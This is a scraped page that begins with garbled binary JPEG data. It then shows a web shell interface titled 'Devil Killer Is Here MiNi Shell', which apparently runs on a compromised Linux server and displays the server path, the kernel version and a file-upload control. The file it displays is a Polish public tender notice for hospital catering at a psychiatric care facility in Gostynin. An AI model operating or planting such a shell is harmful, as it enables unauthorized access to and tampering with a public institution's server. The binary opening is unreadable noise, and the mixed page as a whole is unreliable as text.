JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230913/0039521301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa żywienia w zakresie przygotowania i dostarczania całodziennych posiłków na bazie kuchni Wykonawcy dla WSZPZOZ w Gostyninie-Zalesiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzki Samodzielny Zespół Publicznych Zakładów Opieki Zdrowotnej im. prof. Eugeniusza Wilczkowskiego w Gostyninie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000291724</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zalesie 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gostynin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 236 00 35</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@spzoz-zalesie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spzoz-zalesie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa żywienia w zakresie przygotowania i dostarczania całodziennych posiłków na bazie kuchni Wykonawcy dla WSZPZOZ w Gostyninie-Zalesiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e04a82fe-521e-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00395213</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00012961/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Usługa żywienia w zakr. przygotowania i dostarczania całodziennych posiłków na bazie kuchni Wykonawcy dla pacjentów korzystających z całodobowych świadczeń zdrowotnych w WSZPZOZ Gostyninie Zalesiu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e04a82fe-521e-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W post o udziel zam kom między zam, a wykon odbywa się drogą elektr przy uż Platf e-Zamówienia https://ezamowienia.gov.pl lub poczty elektr zamowienia@spzoz-zalesie.pl. Korz z Platf e-Zamowienia jest bezpłatne.<br/>Wykon zam wziąć udz w post o udziel zam publ musi pos konto podm „Wykonawca” na Platf e-Zamowienia. Szczegó infor na temat zakł kont podm oraz zas i war korz z Platf e-Zamowienia okr Regulamin Platformy e-Zamowienia, dost na str intern https://ezamowienia.gov.pl oraz inf zam w zakładce „Centrum Pomocy”. Przegl i pob publ treści dok post nie wymaga pos konta na Platformie e-Zamowienia ani logowania. Spos sporz i przek dok elektr lub dok elektr będących kopią elektr treści zap w post pap (cyfr odwzor) musi być zgodny z wym okr w rozp Prez Rady Min z 30 grudnia 2020 r. w spr spos sporz i przek infor oraz wym tech dla dok elektr oraz śr kom elektr w post o udz zam publ lub konk (zw. dalej Rozpe w sp wym dla dok elektr). Dok elektr, o których mowa w § 2 ust. 1 Rozp Prez Rady Min w spr wym dla dok elektr, sporz się w post elektr, w form danych okr w przep Rozp Rady Min z dnia 12 kwietnia 2012 r. w spr Kraj Ram Interoper, min wym dla rej publ i wym infor w post elektr oraz min wym dla syst teleinfor (zw. dalej „Rozp w spr Kraj Ram Interoper”), z uwzgl rodzaju przek danych i przek się jako zał. W przyp form, o których mowa w art. 66 ust. 1 u.p.z.p., ww. reg nie będą miały bezpośr zastos. Infor, ośw lub dok, inne niż wym w § 2 ust. 1 Rozp w spr wym dla dok elektr, przek w post sporz się w post elektr:<br/>1) w form danych okr w przep Rozp w spr Krajo Ram Interoper (i przek się jako zał), lub 2) jako tekst wpis bezp do wiad przek przy użyciu śr kom elektr (np. w treści „Form do komun”). Komun w post, z wył skł ofert, odb się drogą elektr za pośr form do kom dost w zakł „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań, zawiadomień, zadawanie pytań. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości („dodaj załącznik”). We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem referencyjnym -<br/>SZP.26.16.2023.US.MJ.<br/>9. W przypadku załączników, które są zgodne z u.p.z.p. lub Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>10. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamowienia oraz zalogowania się na Platformie e-Zamowienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia, wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamowienia.<br/>11. Wszelkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości, widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>12. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednolitego formularza).<br/>13. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamowienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamowienia.<br/>14. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamowienia, użytkownicy mogą skorzystać z wsparcia technicznego dostępnego pod numerem telefonu 32/ 7788999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Wojewódzkiego Samodzielnego Zespołu Publicznych Zakładów Opieki Zdrowotnej im. prof. Eugeniusza Wilczkowskiego w Gostyninie, ul. Zalesie 1, 09-500 Gostynin. <br/>2. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L 119 z 4/05/2016 r, str. 1), dalej &#34;RODO&#34;, Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wojewódzki Samodzielny Zespół Publicznych Zakładów Opieki Zdrowotnej im. prof. Eugeniusza Wilczkowskiego w Gostyninie, ul. Zalesie 1, 09-500 Gostynin tel. 24/2360000, e-mail: sekretariat@spzoz-zalesie.pl.<br/>2) Inspektorem ochrony danych osobowych w Wojewódzkim Samodzielnym Zespole Publicznych Zakładów Opieki Zdrowotnej w Gostyninie, ul. Zalesie 1 jest Pan Marek Malczewski, dane kontaktowe: tel. 24/236 00 23, adres poczty elektronicznej: iod@spzoz-zalesie.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego dla zadania pn “Usługa żywienia w zakresie przygotowania i dostarczania całodziennych posiłków na bazie kuchni Wykonawcy dla pacjentów korzystających z całodobowych świadczeń zdrowotnych w WSZPZOZ w Gostyninie-Zalesiu”.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja przetargowa postępowania w oparciu o art. 18 ust. 1 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605), dalej: u.p.z.p.,<br/>5) ponadto dane mogą być przekazywane podmiotom przetwarzającym dane osobowe na zlecenie Administratora i ich upoważnionym pracownikom, przy czym takie podmioty przetwarzają dane na podstawie umowy z nami wyłącznie zgodnie z przepisami w zakresie ochrony danych osobowych oraz pod warunkiem zachowania poufności,<br/>6) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 u.p.zp., przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>7) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio dotyczących Pani/Pana jest wymogiem ustawowym określonym w przepisach u.p.zp., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z u.p.zp.;<br/>8) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>9) posiada Pani/Pan:<br/>a) na podstawie art.15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art.16 RODO prawo do sprostowania Pani/Pana danych osobowych1;<br/>c) na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art 18 ust. 2 RODO2, <br/>10) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>11) nie przysługuje Pani/Panu:<br/> a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż <br/> podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.26.16.2023.US.MJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest świadczenie usług polegających na przygotowywaniu i dostarczaniu do Zamawiającego całodziennych posiłków przygotowywanych na bazie kuchni Wykonawcy dla pacjentów korzystających z całodobowych świadczeń zdrowotnych w Wojewódzkim Samodzielnym Zespole Publicznych Zakładów Opieki Zdrowotnej im. prof. Eugeniusza Wilczkowskiego w Gostyninie, zwanym dalej: WSZPZOZ Gostynin-Zalesie. <br/>W ramach przedmiotu niniejszego zamówienia Wykonawca zobowiązuje się wykonać na rzecz Zamawiającego usługę polegającą na przygotowywaniu i dostarczaniu do Zamawiającego całodziennych posiłków przygotowywanych na bazie kuchni Wykonawcy dla pacjentów korzystających z całodobowych świadczeń zdrowotnych w WSZPZOZ w Gostyninie-Zalesiu z należytą starannością, obowiązującymi przepisami prawa, przepisami bhp i sanitarno-epidemiologicznymi, zgodnie z umową, stanowiącą załącznik nr 2 do tej SWZ, będącą jej integralną częścią, formularzem ofertowym Wykonawcy, stanowiącym załącznik nr 1 do niniejszej SWZ, będący jego integralną częścią oraz niniejszą SWZ wraz z całą zawartością z wyłączeniem załączników 5-7. <br/>Przedmiot niniejszego zamówienia, o którym mowa w ust. 1 tego Rozdziału obejmuje obowiązki Wykonawcy zawierające:<br/>1) przygotowanie i dostawy do oddziałów Zamawiającego, o których mowa w ust. 5 tego Rozdziału posiłków przy uwzględnieniu diety podstawowej, lekkostrawnej, niskotłuszczowej, niskocholesterolowej, bezmlecznej, niskobiałkowej, uwzględniających 3 posiłki dziennie: śniadania, obiady i kolacje oraz dla diet: cukrzycowej, z ograniczeniem substancji pobudzających wydzielanie soku żołądkowego, redukcyjnej, wysokobiałkowej, niskotłuszczowej - trzustkowej, wysokokalorycznej, uwzględniających 5 posiłków dziennie tj.: śniadania, obiady, kolacje, II śniadania, podwieczorek przez 7 dni w tygodniu dwa razy dziennie (tj.: śniadania i II śniadania 7:30-8:15 oraz obiad, podwieczorek i kolacja 12:45 – 13:30), w systemie termosowym, tzn. z zastosowaniem specjalistycznych, atestowanych termo portów, pojemników GN lub równoważnych, zapewniających utrzymanie optymalnej temperatury i jakości posiłków podczas transportu z kuchni Wykonawcy; <br/>2) realizację przedmiotu niniejszego zamówienia, o którym mowa w tym Rozdziale w ilościach wynikających z liczby hospitalizowanych pacjentów Zamawiającego z uwzględnieniem wymogów Zamawiającego i zaleceń dietetycznych, z zastrzeżeniem iż rzeczywiste ilości zamówionych przez Zamawiającego posiłków wynikać będą z bieżących potrzeb Zamawiającego uzależnionych od zmieniającej się liczby pacjentów na poszczególnych oddziałach WSZPZOZ w Gostyninie – Zalesie, z zastrzeżeniem § 4 umowy, będącej załącznikiem nr 2 do tej SWZ;<br/>3) realizowanie niniejszego zamówienia, z częstotliwością według następującego harmonogramu:<br/>a) śniadanie (II śniadanie) w godz. 7:30-8:15 (II śniadanie dostarczane ze śniadaniem);<br/>b) obiad (podwieczorek), kolacja 12:45-13:30 (podwieczorek i kolacja dostarczane z obiadem). <br/>Strony zgodnie ustalają, iż Wykonawca zobowiązany jest świadczyć usługi, o których mowa w tym Rozdziale na rzecz poniżej wymienionych oddziałów szpitalnych:<br/> 1) Oddział Rehabilitacji Psychiatrycznej – RP – (Pawilon nr 1);<br/> 2) Zakład Opiekuńczo Leczniczy – ZOL – (Pawilon nr 2);<br/> 3) Oddział Rehabilitacji Neurologicznej – RN – (Pawilon nr 3);<br/> 4) Oddział Psychiatryczny III – (Pawilon nr 3);<br/> 5) Oddział Psychogeriatrii – PG – (Pawilon nr 6);<br/> 6) Całodobowy Oddział Terapii Uzależnienia od Alkoholu – COTUA – (Pawilon nr 6);<br/> 7) Oddział Leczenia Zespołów Abstynencyjnych po Substancjach Psychoaktywnych – (Pawilon nr 6);<br/> 8) Pododdział Leczenia Alkoholowych Zespołów Abstynencyjnych – (Pawilon nr 6);<br/> 9) Oddział Psychiatryczny V – (Pawilon nr 7);<br/> 10) Oddział Psychiatryczny VI – (Pawilon nr 7).<br/> Wykonawca zachowa obowiązujące normy sanitarno-epidemiologiczne oraz podda się nadzorowi epidemiologicznemu, audytom przeprowadzonym u wykonawcy przez upoważnionego pracownika zamawiającego. Każdorazowo na żądanie zamawiającego wykonawca winien okazać pracownicze książeczki zdrowia personelu oraz dokumentację z kontroli przeprowadzonych przez Stację Sanitarno-Epidemiologiczną.<br/>Zamawiający, przy obliczaniu wartości całego kontraktu (12 m-cy) będzie posługiwał się następującym wariantem cenowym: <br/> 1) Szacunkowa liczba pacjentów przebywających jednoczasowo w Zespole w okresie od 1 października 2023 r. do 30 września 2024 r. wynosi – 350. Szacunkowa miesięczna liczba osobodni wynosi 10500, przy czym ilość ta może ulec zmianie w zależności od liczby hospitalizacji w Zespole.<br/> 2) Szacowana liczba konkretnych posiłków za 12 pełnych miesięcy kalendarzowych, przy szacunkowym obłożeniu 350 pacjentów w ciągu dnia wynosi: śniadanie (II śniadanie): 126 000; obiad: 126 000; kolacja (podwieczorek): 126 000. <br/> 3) Procentowy podział niepełnych posiłków jest następujący: <br/> a) w przypadku 3 posiłków: śniadanie 30-35%; obiad 35-40%; kolacja 25-30%; <br/> b) w przypadku 5 posiłków: śniadanie 25-30%; II śniadanie 5-10%; obiad 35-40%; podwieczorek 5-10%; kolacja 15-20%. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <p class="mb-0">55521200-0 - Usługi dowożenia posiłków</p> <p class="mb-0">15894220-9 - Posiłki szpitalne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena brutto - 60%<br/>Organizacja, kwalifikacje zawodowe i doświadczenie - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Organizacja, kwalifikacje zawodowe i doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale XII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>3) sytuacji ekonomicznej i 